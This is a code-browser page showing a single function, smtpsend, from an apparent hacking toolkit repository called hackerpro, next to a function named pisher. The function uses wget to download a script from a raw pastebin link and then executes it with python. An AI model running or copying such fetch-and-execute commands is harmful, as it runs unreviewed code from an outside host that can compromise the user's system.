Code
Hub
Workspaces
Connect
Indexed graphs
Engine
MCP
copy
Index your code
hub
/
github.com/jaykali/hackerpro
/ smtpsend
Function
smtpsend
hackerpro.py:990–993 ·
view source on GitHub ↗
()
Source
from the content-addressed store, hash-verified
988
989
990
def
smtpsend():
991
os.system(
"wget http://pastebin.com/raw/Nz1GzWDS --output-document=smtp.py"
)
992
clearScr()
993
os.system(
"python smtp.py"
)
994
995
996
def
pisher():
Callers
1
snif
Function · 0.85
Calls
1
clearScr
Function · 0.85
Tested by
no test coverage detected